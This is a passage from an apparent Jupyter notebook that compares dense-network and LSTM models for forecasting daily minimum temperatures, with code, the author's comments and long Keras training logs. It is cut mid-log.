df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),\n lambda d : d.Date[:4],\n lambda d : d.Date[5:7],\n lambda d : d.Date[8:]\n ],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)\n\n #One Hot conversion for dates\n for c in ['Month','Day']:\n oneHot = pd.get_dummies(dateConverted[c],prefix=c)\n dateConverted = dateConverted.drop(c,axis=1)\n dateConverted = dateConverted.join(oneHot)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnew_dates, new_temp = massageData(df)\n\n\ntrain_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)\nmodel = build_model()\nmodel.fit(train_x,train_y,epochs=80,validation_split=0.2)\nmodel.evaluate(test_x,test_y,verbose=1)\n'''\nThe naive approach seems to think more in terms of averages rather than actual predictions.\nAlso, the predictions, once outside the range of years, may become wildly inaccurate.\n'''\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\n\nconvertedDates = convertDates(df)\npredicted1 = pd.DataFrame(model.predict(convertedDates[convertedDates.columns[2:]]),columns=['PredictedTemp1'])\ntemps = predicted1.join(pd.DataFrame(normalizeTemp(df[['Temp']]),columns=['TrueValue']))\ndatetimeToTemp = convertedDates[['Datetime']].join(temps)\n\ndatetimeToTemp.plot('Datetime',figsize=(30,10))\ndatetimeToTemp", "Epoch 1/80\n69/69 [==============================] - 0s 3ms/step - loss: 0.1688 - mae: 0.3320 - mse: 0.1688 - val_loss: 0.0462 - val_mae: 0.1729 - val_mse: 0.0462\nEpoch 2/80\n69/69 
[==============================] - 0s 2ms/step - loss: 0.0971 - mae: 0.2498 - mse: 0.0971 - val_loss: 0.0283 - val_mae: 0.1337 - val_mse: 0.0283\nEpoch 3/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0665 - mae: 0.2031 - mse: 0.0665 - val_loss: 0.0263 - val_mae: 0.1289 - val_mse: 0.0263\nEpoch 4/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0553 - mae: 0.1844 - mse: 0.0553 - val_loss: 0.0227 - val_mae: 0.1193 - val_mse: 0.0227\nEpoch 5/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0499 - mae: 0.1756 - mse: 0.0499 - val_loss: 0.0213 - val_mae: 0.1156 - val_mse: 0.0213\nEpoch 6/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0396 - mae: 0.1557 - mse: 0.0396 - val_loss: 0.0213 - val_mae: 0.1156 - val_mse: 0.0213\nEpoch 7/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0340 - mae: 0.1439 - mse: 0.0340 - val_loss: 0.0194 - val_mae: 0.1100 - val_mse: 0.0194\nEpoch 8/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0317 - mae: 0.1403 - mse: 0.0317 - val_loss: 0.0177 - val_mae: 0.1047 - val_mse: 0.0177\nEpoch 9/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0280 - mae: 0.1318 - mse: 0.0280 - val_loss: 0.0192 - val_mae: 0.1093 - val_mse: 0.0192\nEpoch 10/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0259 - mae: 0.1270 - mse: 0.0259 - val_loss: 0.0178 - val_mae: 0.1050 - val_mse: 0.0178\nEpoch 11/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0249 - mae: 0.1248 - mse: 0.0249 - val_loss: 0.0165 - val_mae: 0.1006 - val_mse: 0.0165\nEpoch 12/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0241 - mae: 0.1226 - mse: 0.0241 - val_loss: 0.0172 - val_mae: 0.1033 - val_mse: 0.0172\nEpoch 13/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0223 - mae: 0.1183 - mse: 0.0223 - val_loss: 0.0163 - val_mae: 0.1001 - val_mse: 0.0163\nEpoch 14/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0221 - mae: 0.1175 - mse: 0.0221 - val_loss: 0.0165 - val_mae: 0.1007 - val_mse: 0.0165\nEpoch 15/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0218 - mae: 0.1159 - mse: 0.0218 - val_loss: 0.0164 - val_mae: 0.1005 - val_mse: 0.0164\nEpoch 16/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0217 - mae: 0.1157 - mse: 0.0217 - val_loss: 0.0163 - val_mae: 0.1003 - val_mse: 0.0163\nEpoch 17/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0211 - mae: 0.1142 - mse: 0.0211 - val_loss: 0.0169 - val_mae: 0.1021 - val_mse: 0.0169\nEpoch 18/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0212 - mae: 0.1163 - mse: 0.0212 - val_loss: 0.0166 - val_mae: 0.1011 - val_mse: 0.0166\nEpoch 19/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0203 - mae: 0.1124 - mse: 0.0203 - val_loss: 0.0160 - val_mae: 0.0994 - val_mse: 0.0160\nEpoch 20/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0197 - mae: 0.1105 - mse: 0.0197 - val_loss: 0.0162 - val_mae: 0.1000 - val_mse: 0.0162\nEpoch 21/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0199 - mae: 0.1115 - mse: 0.0199 - val_loss: 0.0155 - val_mae: 0.0977 - val_mse: 0.0155\nEpoch 22/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0195 - mae: 0.1096 - mse: 0.0195 - val_loss: 0.0152 - val_mae: 0.0966 - val_mse: 0.0152\nEpoch 23/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0196 - mae: 0.1104 - mse: 0.0196 - 
val_loss: 0.0153 - val_mae: 0.0967 - val_mse: 0.0153\nEpoch 24/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0201 - mae: 0.1115 - mse: 0.0201 - val_loss: 0.0155 - val_mae: 0.0975 - val_mse: 0.0155\nEpoch 25/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1082 - mse: 0.0191 - val_loss: 0.0152 - val_mae: 0.0965 - val_mse: 0.0152\nEpoch 26/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1091 - mse: 0.0191 - val_loss: 0.0150 - val_mae: 0.0961 - val_mse: 0.0150\nEpoch 27/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1092 - mse: 0.0191 - val_loss: 0.0158 - val_mae: 0.0988 - val_mse: 0.0158\nEpoch 28/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0189 - mae: 0.1080 - mse: 0.0189 - val_loss: 0.0156 - val_mae: 0.0979 - val_mse: 0.0156\nEpoch 29/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1073 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 30/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1081 - mse: 0.0188 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 31/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1082 - mse: 0.0190 - val_loss: 0.0148 - val_mae: 0.0952 - val_mse: 0.0148\nEpoch 32/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1088 - mse: 0.0190 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 33/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0191 - mae: 0.1082 - mse: 0.0191 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 34/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1088 - mse: 0.0188 - val_loss: 0.0152 - val_mae: 0.0965 - val_mse: 0.0152\nEpoch 35/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1084 - mse: 0.0187 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 36/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0193 - mae: 0.1091 - mse: 0.0193 - val_loss: 0.0149 - val_mae: 0.0957 - val_mse: 0.0149\nEpoch 37/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1071 - mse: 0.0182 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 38/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1088 - mse: 0.0186 - val_loss: 0.0144 - val_mae: 0.0940 - val_mse: 0.0144\nEpoch 39/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1079 - mse: 0.0190 - val_loss: 0.0156 - val_mae: 0.0981 - val_mse: 0.0156\nEpoch 40/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1072 - mse: 0.0185 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 41/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1090 - mse: 0.0190 - val_loss: 0.0152 - val_mae: 0.0968 - val_mse: 0.0152\nEpoch 42/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1067 - mse: 0.0182 - val_loss: 0.0146 - val_mae: 0.0946 - val_mse: 0.0146\nEpoch 43/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1075 - mse: 0.0187 - val_loss: 0.0150 - val_mae: 0.0962 - val_mse: 0.0150\nEpoch 44/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1068 - mse: 0.0184 - val_loss: 0.0150 - val_mae: 0.0959 - val_mse: 0.0150\nEpoch 45/80\n69/69 
[==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1077 - mse: 0.0184 - val_loss: 0.0144 - val_mae: 0.0941 - val_mse: 0.0144\nEpoch 46/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1065 - mse: 0.0183 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 47/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1071 - mse: 0.0185 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 48/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0190 - mae: 0.1083 - mse: 0.0190 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 49/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1080 - mse: 0.0186 - val_loss: 0.0147 - val_mae: 0.0950 - val_mse: 0.0147\nEpoch 50/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1081 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 51/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1060 - mse: 0.0185 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 52/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1072 - mse: 0.0182 - val_loss: 0.0147 - val_mae: 0.0950 - val_mse: 0.0147\nEpoch 53/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1073 - mse: 0.0185 - val_loss: 0.0156 - val_mae: 0.0983 - val_mse: 0.0156\nEpoch 54/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1071 - mse: 0.0186 - val_loss: 0.0151 - val_mae: 0.0964 - val_mse: 0.0151\nEpoch 55/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0180 - mae: 0.1062 - mse: 0.0180 - val_loss: 0.0147 - val_mae: 0.0953 - val_mse: 0.0147\nEpoch 56/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0188 - mae: 0.1077 - mse: 0.0188 - val_loss: 0.0152 - val_mae: 0.0970 - val_mse: 0.0152\nEpoch 57/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1070 - mse: 0.0184 - val_loss: 0.0146 - val_mae: 0.0947 - val_mse: 0.0146\nEpoch 58/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0176 - mae: 0.1041 - mse: 0.0176 - val_loss: 0.0144 - val_mae: 0.0941 - val_mse: 0.0144\nEpoch 59/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1054 - mse: 0.0179 - val_loss: 0.0151 - val_mae: 0.0963 - val_mse: 0.0151\nEpoch 60/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1055 - mse: 0.0179 - val_loss: 0.0150 - val_mae: 0.0960 - val_mse: 0.0150\nEpoch 61/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1073 - mse: 0.0184 - val_loss: 0.0146 - val_mae: 0.0948 - val_mse: 0.0146\nEpoch 62/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1070 - mse: 0.0184 - val_loss: 0.0156 - val_mae: 0.0980 - val_mse: 0.0156\nEpoch 63/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1077 - mse: 0.0186 - val_loss: 0.0147 - val_mae: 0.0953 - val_mse: 0.0147\nEpoch 64/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0181 - mae: 0.1063 - mse: 0.0181 - val_loss: 0.0147 - val_mae: 0.0948 - val_mse: 0.0147\nEpoch 65/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1072 - mse: 0.0185 - val_loss: 0.0152 - val_mae: 0.0969 - val_mse: 0.0152\nEpoch 66/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1068 - mse: 0.0185 
- val_loss: 0.0146 - val_mae: 0.0946 - val_mse: 0.0146\nEpoch 67/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1047 - mse: 0.0179 - val_loss: 0.0144 - val_mae: 0.0939 - val_mse: 0.0144\nEpoch 68/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0186 - mae: 0.1074 - mse: 0.0186 - val_loss: 0.0148 - val_mae: 0.0956 - val_mse: 0.0148\nEpoch 69/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0185 - mae: 0.1079 - mse: 0.0185 - val_loss: 0.0148 - val_mae: 0.0954 - val_mse: 0.0148\nEpoch 70/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0184 - mae: 0.1063 - mse: 0.0184 - val_loss: 0.0150 - val_mae: 0.0961 - val_mse: 0.0150\nEpoch 71/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1057 - mse: 0.0182 - val_loss: 0.0152 - val_mae: 0.0968 - val_mse: 0.0152\nEpoch 72/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1070 - mse: 0.0183 - val_loss: 0.0142 - val_mae: 0.0933 - val_mse: 0.0142\nEpoch 73/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0187 - mae: 0.1078 - mse: 0.0187 - val_loss: 0.0152 - val_mae: 0.0966 - val_mse: 0.0152\nEpoch 74/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1070 - mse: 0.0182 - val_loss: 0.0147 - val_mae: 0.0952 - val_mse: 0.0147\nEpoch 75/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1067 - mse: 0.0183 - val_loss: 0.0150 - val_mae: 0.0962 - val_mse: 0.0150\nEpoch 76/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0179 - mae: 0.1057 - mse: 0.0179 - val_loss: 0.0152 - val_mae: 0.0970 - val_mse: 0.0152\nEpoch 77/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1060 - mse: 0.0183 - val_loss: 0.0151 - val_mae: 0.0966 - val_mse: 0.0151\nEpoch 78/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0180 - mae: 0.1064 - mse: 0.0180 - val_loss: 0.0143 - val_mae: 0.0937 - val_mse: 0.0143\nEpoch 79/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0183 - mae: 0.1070 - mse: 0.0183 - val_loss: 0.0150 - val_mae: 0.0963 - val_mse: 0.0150\nEpoch 80/80\n69/69 [==============================] - 0s 2ms/step - loss: 0.0182 - mae: 0.1064 - mse: 0.0182 - val_loss: 0.0151 - val_mae: 0.0967 - val_mse: 0.0151\n29/29 [==============================] - 0s 1ms/step - loss: 0.0168 - mae: 0.1010 - mse: 0.0168\n" ], [ "'''\nLess Naive approach? (AKA, \"featurize the past?\")\n-Convert Date into Year,Month,Days. 
These should become one-hot variables.\n-Suppose the idea of years is not in this model.\n-Add a feature column that contains the previous 30 days of temperatures.\n-The idea is that previous days can affect the next.\n'''\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\ndef build_model():\n model = Sequential([\n layers.Flatten(input_shape=(73,)),\n layers.Dropout(0.5),\n layers.Dense(73,activation='relu'),\n layers.Dropout(0.5),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])\n\n return model\n\ndef convertDates(df):\n dateConverted = df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),\n lambda d : d.Date[:4],\n lambda d : d.Date[5:7],\n lambda d : d.Date[8:]\n ],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)\n\n #One Hot conversion for dates\n for c in ['Month','Day']:\n oneHot = pd.get_dummies(dateConverted[c],prefix=c)\n dateConverted = dateConverted.drop(c,axis=1)\n dateConverted = dateConverted.join(oneHot)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnew_dates, new_temp = massageData(df)\n\nnew_temp_df = pd.DataFrame(new_temp,columns=['Temp'])\n\n\n#Add the past into it.\nfor i in range(1,31):\n new_dates['temp_days_minus_'+str(i)] = new_temp_df[['Temp']].shift(i)\n\nnew_dates = new_dates[30:] \nnew_temp = new_temp[30:] \n\ntrain_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)\nmodel = build_model()\nmodel.fit(train_x,train_y,epochs=80,validation_split=0.2,verbose=0)\nmodel.evaluate(test_x,test_y,verbose=1)\n\n'''\nThis still seems to have the same issues with the last one.\nThe only apparent difference is that the second model seems to\nfollow the extremes more closely.\n'''\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\n\nconvertedDates = convertDates(df)[30:]\npredicted1edited = predicted1[30:]\npredicted1edited.index = convertedDates.index = range(0,len(convertedDates))\npredicted2 = pd.DataFrame(model.predict(new_dates),columns=['PredictedTemp2'])\ntemps = predicted1edited.join(predicted2).join(pd.DataFrame(new_temp,columns=['TrueTemp']))\ndatetimeToTemp = convertedDates[['Datetime']].join(temps)\n\n\ndatetimeToTemp.plot('Datetime',figsize=(30,10))\ndatetimeToTemp", "29/29 [==============================] - 0s 1ms/step - loss: 0.0140 - mae: 0.0916 - mse: 0.0140\n" ], [ "'''\nLong-Short Term Memory approach.\n-Use LSTM and concepts from RNN networks.\n'''\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\n\ndef convertDates(df):\n dateConverted = df[['Date']].apply([\n lambda d : datetime.strptime(d.Date, '%Y-%m-%d')\n ],axis=1).set_axis(['Datetime'],axis=1)\n return dateConverted\n\ndef normalizeTemp(df):\n mms = MinMaxScaler()\n normalized_train_y = 
mms.fit_transform(df[['Temp']])\n return normalized_train_y\n\ndef massageData(df):\n #Expand Dates\n dateConverted = convertDates(df)\n #Remove certain columns\n dateConverted.pop('Datetime')\n dateConverted.pop('Year')\n\n #Normalize tempatures\n return dateConverted, normalizeTemp(df)\n\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\nnorm_temp = normalizeTemp(df)\n\n\n\n\ndef build_model():\n model = Sequential([\n layers.LSTM(30,input_shape=(30,1)),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mae',metrics=['mae','mse'])\n\n return model\n\nxs = np.array([\n np.reshape(norm_temp[i-31:i-1],(30,1))\n for i in range(31,len(norm_temp))])\n\nys = np.array([\n norm_temp[i]\n for i in range(31,len(norm_temp))])\nc = [\"temp_\"+str(x) for x in range(1,31)]+[\"true_value\"]\n\ntrain_x, test_x, train_y, test_y = train_test_split(xs,ys,test_size=0.25)\nmodel = build_model()\n\nprint(train_y.shape)\nprint(test_y.shape)\n\nmodel.fit(train_x,train_y,validation_split=0.2,epochs=80)\nmodel.evaluate(test_x,test_y,verbose=1)\n'''\nIt appears RNNs really do work here.\n'''\npredicted3 = pd.DataFrame(model.predict(xs),columns=['PredictedTemp3'])\ntrue = pd.DataFrame(ys,columns=['True'])\nplot_me = datetimeToTemp.join(predicted3)\nplot_me = plot_me[['PredictedTemp1','PredictedTemp2','PredictedTemp3','TrueTemp']]\nplot_me.plot(figsize=(30,20))", "(2714, 1)\n(905, 1)\nEpoch 1/80\n68/68 [==============================] - 1s 16ms/step - loss: 0.1455 - mae: 0.1455 - mse: 0.0395 - val_loss: 0.0852 - val_mae: 0.0852 - val_mse: 0.0125\nEpoch 2/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0876 - mae: 0.0876 - mse: 0.0125 - val_loss: 0.0822 - val_mae: 0.0822 - val_mse: 0.0118\nEpoch 3/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0856 - mae: 0.0856 - mse: 0.0119 - val_loss: 0.0807 - val_mae: 0.0807 - val_mse: 0.0114\nEpoch 4/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0849 - mae: 0.0849 - mse: 0.0117 - val_loss: 0.0804 - val_mae: 0.0804 - val_mse: 0.0114\nEpoch 5/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0848 - mae: 0.0848 - mse: 0.0116 - val_loss: 0.0826 - val_mae: 0.0826 - val_mse: 0.0118\nEpoch 6/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0853 - mae: 0.0853 - mse: 0.0117 - val_loss: 0.0802 - val_mae: 0.0802 - val_mse: 0.0113\nEpoch 7/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0794 - val_mae: 0.0794 - val_mse: 0.0111\nEpoch 8/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0793 - val_mae: 0.0793 - val_mse: 0.0111\nEpoch 9/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0840 - mae: 0.0840 - mse: 0.0114 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0112\nEpoch 10/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0115 - val_loss: 0.0789 - val_mae: 0.0789 - val_mse: 0.0110\nEpoch 11/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0837 - mae: 0.0837 - mse: 0.0113 - val_loss: 0.0824 - val_mae: 0.0824 - val_mse: 0.0118\nEpoch 12/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0838 - mae: 0.0838 - mse: 0.0114 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 13/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0812 - val_mae: 0.0812 - val_mse: 
0.0115\nEpoch 14/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0846 - mae: 0.0846 - mse: 0.0116 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0109\nEpoch 15/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0852 - mae: 0.0852 - mse: 0.0118 - val_loss: 0.0834 - val_mae: 0.0834 - val_mse: 0.0121\nEpoch 16/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0841 - mae: 0.0841 - mse: 0.0115 - val_loss: 0.0788 - val_mae: 0.0788 - val_mse: 0.0110\nEpoch 17/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0812 - val_mae: 0.0812 - val_mse: 0.0115\nEpoch 18/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0845 - mae: 0.0845 - mse: 0.0115 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0110\nEpoch 19/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0801 - val_mae: 0.0801 - val_mse: 0.0113\nEpoch 20/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0113 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 21/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0111 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 22/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0112 - val_loss: 0.0806 - val_mae: 0.0806 - val_mse: 0.0115\nEpoch 23/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 24/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0832 - mae: 0.0832 - mse: 0.0111 - val_loss: 0.0808 - val_mae: 0.0808 - val_mse: 0.0116\nEpoch 25/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0114 - val_loss: 0.0827 - val_mae: 0.0827 - val_mse: 0.0120\nEpoch 26/80\n68/68 [==============================] - 1s 15ms/step - loss: 0.0841 - mae: 0.0841 - mse: 0.0115 - val_loss: 0.0810 - val_mae: 0.0810 - val_mse: 0.0115\nEpoch 27/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0842 - mae: 0.0842 - mse: 0.0115 - val_loss: 0.0797 - val_mae: 0.0797 - val_mse: 0.0112\nEpoch 28/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0112 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0110\nEpoch 29/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0115 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0114\nEpoch 30/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0831 - mae: 0.0831 - mse: 0.0112 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 31/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0836 - mae: 0.0836 - mse: 0.0112 - val_loss: 0.0800 - val_mae: 0.0800 - val_mse: 0.0113\nEpoch 32/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0834 - mae: 0.0834 - mse: 0.0113 - val_loss: 0.0814 - val_mae: 0.0814 - val_mse: 0.0118\nEpoch 33/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0839 - mae: 0.0839 - mse: 0.0114 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 34/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0113 - val_loss: 0.0816 - val_mae: 0.0816 - val_mse: 0.0116\nEpoch 35/80\n68/68 [==============================] - 1s 
11ms/step - loss: 0.0833 - mae: 0.0833 - mse: 0.0112 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0110\nEpoch 36/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0836 - mae: 0.0836 - mse: 0.0113 - val_loss: 0.0817 - val_mae: 0.0817 - val_mse: 0.0118\nEpoch 37/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0113\nEpoch 38/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0834 - mae: 0.0834 - mse: 0.0112 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0110\nEpoch 39/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0792 - val_mae: 0.0792 - val_mse: 0.0111\nEpoch 40/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 41/80\n68/68 